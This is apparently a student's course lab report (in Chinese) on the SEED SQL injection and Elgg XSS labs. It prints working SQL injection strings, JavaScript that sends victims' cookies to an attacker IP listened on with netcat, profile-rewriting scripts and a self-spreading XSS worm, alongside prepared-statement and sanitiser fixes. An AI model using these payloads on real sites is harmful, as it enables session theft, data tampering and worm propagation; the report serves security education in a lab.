20242827 2024-2025-2 《网络攻防实践》实践十报告

20242827 2024-2025-2 《网络攻防实践》实践十报告

目录

• 20242827 2024-2025-2 《网络攻防实践》实践十报告
  • 1.实践内容
  • 2.实践过程
    • 2.1 SEED SQL注入攻击与防御实验
      • 2.1.1 熟悉SQL语句
      • 2.1.2 对 SELECT 语句的SQL注入攻击
      • 2.1.3 对UPDATE语句的SQL注入攻击
      • 2.1.4 SQL对抗
    • 2.2 SEED XSS跨站脚本攻击实验
      • 2.2.1 发布恶意消息，显示警报窗口
      • 2.2.2 弹窗显示 cookie 信息
      • 2.2.3 窃取受害者的 cookies
      • 2.2.4 成为受害者的朋友
      • 2.2.5 修改受害者的信息
      • 2.2.6 编写XSS蠕虫
      • 2.2.7 对抗XSS攻击
  • 3.学习中遇到的问题及解决
  • 4.实践总结

1.实践内容

一、SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序，并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：
熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。
对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。
对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
SQL对抗：修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。
发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。
弹窗显示cookie信息：将cookie信息显示。
窃取受害者的cookies：将cookie发送给攻击者。
成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。
修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。
编写XSS蠕虫。
对抗XSS攻击。

2.实践过程

一开始我直接用原本的SEEDUbuntu做的，但是

很明显这个seedUbuntu有问题。

所以，我们需要配置好环境，可以点这个链接下载SEEDubuntu16.04的网址，（我点的这个DigitalOcean，一开始点的浙大的那个下载选项，但是下载之后说它的压缩包已损坏，就换了一个别的）

下载好之后，解压好可以看到vmdk文件，

此时我们需要新建一个虚拟机，按照之前实验一的步骤来安装就可以了。

1）在Vmware中选择“创建新的虚拟机”
2）选择“自定义”
3）选择Workstation14.x
4）选择“稍后安装操作系统”
5）选择“Linux”
6）选择“Ubuntu”
7）选择“位置随意、处理器2内核1、内存2048MB”
8）选择“网络地址转换”
9）选择“LSI Logic”
10）选择“SCSI”
11）选择现有虚拟磁盘中的“SEEDUbuntu-16.04-32bit.vmdk”

等我们安装好之后，记得设置一下。

开始准备实验吧！

2.1 SEED SQL注入攻击与防御实验

2.1.1 熟悉SQL语句

mysql -u root -p  #-u root: 指定要使用的用户名，这里是 root 用户。-p: 表示将提示我们输入密码来验证用户身份。在输入命令后，系统会提示您输入密码，然后按回车键确认。
use Users;  #use 后面跟着数据库名称，表示进入该数据库。
show tables;  #显示当前数据库中的所有表格（或称为数据表）。
select * from credential;  #从名为 credential 的表格中检索所有的行和列，并将它们作为结果返回。
select * from credential where Name='Alice';   #从名为 credential 的表格中检索所有 Name 列的值等于 'Alice' 的行，并将它们作为结果返回。

在SEED Ubuntu中输入命令mysql -u root -p，回车，输入密码seedubuntu登录数据库。

输入命令use Users;查询Users数据库中的数据表，并使用命令读取数据表中的字段，每行分别输入回车执行，如下图所示。（别忘记了分号！）

show tables;	
select * from credential;

2.1.2 对 SELECT 语句的SQL注入攻击

打开seedubuntu中的浏览器，里面有文件夹sites for labs，其中的SQL Injection Site，点击进入网址http://www.seedlabsqlinjection.com/

任意输入用户名和密码，发现登录失败。

我们刷新一下页面，之后在页面右键，点击

选择Network可以发现用户名和密码通过GET请求提交至unsafe_home.php页面进行身份检验。

在Computer–Var–www–SQLInjection中找到这个文件并打开

分析这个文件可以看到进行登录验证时的SQL指令，用户名为$input_uname，而在SQL指令中#表示将后续内容注释掉，’ 单引号表示终止当前的SQL指令，密码经过哈希加密，我们很难破解，所以将其注释，这样我们就可以输入任意用户名'# 密码随便，进行登录

接着可以看到登录时分为管理员登录和普通用户登录

这里我们使用Admin’#进行登录，密码随便输入，发现登录成功

成功登录后可以看到里面的用户信息

2.1.3 对UPDATE语句的SQL注入攻击

进入unsafe_edit_backend.php文件查看相关指令，可以看到我们可以修改昵称、邮箱、地址、密码和ID号码。

按照上述的分析我们首先使用用户名Samy’#进行登录

登录成功进入后点击Edit Profile进行修改，输入', salary='2827' where Name='Samy';#把Samy的Salary修改为2827，修改好后点击Save，可以看到已经修改完成了

还有，在终端中输入命令vim /var/www/SQLInjection/unsafe_edit_backend.php查看对应的代码。正常情况下员工可以修改自己的昵称、右键、地址、密码和电话号码。

其中，要注入的SQL语句为：UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;
在 NickName 一栏输入’, salary=‘2827’ where Name=‘Alice’;#，则SQL查询变为：UPDATE credential SET nickname='', salary='2827' where Name='Alice';#,email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;

成功将Alice的工资金额修改为2827

2.1.4 SQL对抗

我们在上述实验中使用了SQL语句中#会把后面代码注视掉、单引号会截断代码的特点，成功非法登录进了系统，针对这一漏洞，可以采用参数绑定的方法来进行修复，对于unsafe_home.php文件，我们进行如下修改

//原来的php代码：
$sql = "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= '$input_uname' and Password='$hashed_pwd';";

//修改后的php代码：
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?;");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

修改好后，再次登录发现登录失败

对于更改漏洞，我们对unsafe_edit_backend.php文件进行如下修改

//原来的php代码
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',Password='$hashed_pwd',PhoneNumber='$input_phonenumber' where ID=$id;";
  }else{
// if passowrd field is empty.
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";
}

//修改后的php代码：
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("sssss", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber);
}else{
// if passowrd field is empty.
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email, $input_address, $input_phonenumber);
}

修改完成后再次进入修改发现没有反应。

2.2 SEED XSS跨站脚本攻击实验

跨站脚本攻击XSS(Cross Site Scripting)，通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。
XSS分为：存储型 、反射型 、DOM型三种

存储型XSS：存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie
反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。
DOM型XSS：不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。

2.2.1 发布恶意消息，显示警报窗口

首先打开seedubuntu中的浏览器进入网址http://www.xsslabelgg.com，网址可以在文件夹里找就可以了
点击Log in进行登录，这里的用户名和密码为：

用户名	密码
Alice	seedalice
Boby	seedboby
Samy	seedsamy
Admin	seedelgg

我们选择使用Alice的身份登录，用户名为Alice，密码为seedalice。

点击“Alice”——“Edit Profile”，然后在“Brief description”中写入以下内容：<script>alert("20242827");</script> //弹出警告窗口，显示“20242827”

点击“Save”，之后每次访问http://www.xsslabelgg.com/profile/alice都会弹出20242827的alert窗口

2.2.2 弹窗显示 cookie 信息

把填入“Brief description”中的内容改为：<script> alert(document.cookie);</script>

即可弹窗显示cookie信息：

2.2.3 窃取受害者的 cookies

打开终端查看一下虚拟机的IP地址为192.168.200.68

再次进入编辑界面，在Brief description中输入

<script>
  document.write('<img src=http://192.168.200.68:1921?c=' + escape(document.cookie) + '>');
</script>

在终端中输入nc -l 1921 -v监听1921端口，然后在网页上登录Samy访问Alice，可以看到监听到以下内容(其实之后只要有用户访问Alice的主页，netcat就会接收到该用户的cookie)

2.2.4 成为受害者的朋友

以用户 Alice 的身份登录，然后访问用户 Boby 的主页：http://www.xsslabelgg.com/profile/boby，点击“Add Friend”按钮。

我们发现，点击按钮后浏览器向http://www.xsslabelgg.com/action/friends/add发送了GET请求，并附带了以下三个参数：

friend=45：请求添加的对象id
__elgg_ts=1715849723：时间戳
__elgg_token=8s6rxvluUUz-8kY8-VbeoQ：令牌

我们根据这个方法可以得知：

Alice的id为44
Boby的id为45
Charlie的id为46
Samy的id为47
Admin的id为36

点击这条新指令得到这条指令的url，可以根据这条url构造payload，在Alice的About me栏中添加这段代码，可以做到无需审核直接添加好友。（注意，这里必须点击About me框右上角的edit html，才可以进行添加这段代码，否则添加不成功）

<script type="text/javascript">
window.onload = function () {
    var Ajax = null;
    var ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;

  	var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; 
	Ajax = new XMLHttpRequest();
	Ajax.open("GET", sendurl, true);
	Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	Ajax.send();
}
</script>

可以看到已经成功添加好友。

2.2.5 修改受害者的信息

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
    var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var aliceGuid=44;    
	if(elgg.session.user.guid!=aliceGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}
</script>

将这一部分代码放入Alice用户profile的About Me中，首先编辑profile，然后单击About me最右侧的Edit HTML，在文本框中填入上述代码保存即可

然后退出Alice，使用Boby登录。确认Boby的profile为空。

在成员中访问Alice主页，再通过左上角返回自己的profile，即可发现自己的About me已经被修改。

2.2.6 编写XSS蠕虫

如上继续观察网页的代码和参数，可以编写以下代码：

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>";
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "&name=" + userName + "&description=<p>20232822mali"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

将这一部分代码放入Alice用户profile的About Me中，首先编辑profile，然后单击About me最右侧的Edit HTML，在文本框中填入上述代码保存即可。

然后退出Alice，使用Boby登录。首先确认Boby的profile，

然后在成员中访问Alice主页，再通过左上角返回自己的profile，即可发现自己的About me已经再次被修改

再登录Samy的账号访问Boby的主页，发现Samy和Boby的About me都被修改了.

发现传染性！蠕虫构造成功！

2.2.7 对抗XSS攻击

登录管理员Admin的账户，点击右上角的Account–Administration进入管理界面后点击Plugins

并找到插件HTMLawed并点击Activate按钮激活该插件：

激活后，重新进行XSS攻击实验，例如，这里重新进行修改受害者主页信息的XSS攻击，就会发现，XSS攻击已经失效。对抗XSS攻击成功！
即，重新让Admin访问Alice，发现无法进行主页修改。

3.学习中遇到的问题及解决

• 问题1：修复漏洞时需要修改unsafe_home.php和unsafe_edit_backend.php的代码，发现修改不成功
• 问题1解决方案：发现没有权限，要进入管理员模式才可以修改
• 问题2：环境配置不对，建立的网站打不开
• 问题2解决方案：下载安装SEEDUbuntu-16.04-32
• 问题3：About me框添加js程序代码失败
• 问题3解决方案：需要打开About me框右上角的edit html模式，否则Visual editor模式下是无法保存js程序代码的

4.实践总结

通过本次实践，我了解了SQL注入攻击、XSS攻击、XSS蠕虫编写、Web的前后端的相关知识。本次实践主要卡在一开始的SeedUbuntu的下载安装与使用，后面过程还是很顺利的。在之后的学习中，我会继续增强对于网络攻击与防御技术的学习实践，提高实践能力。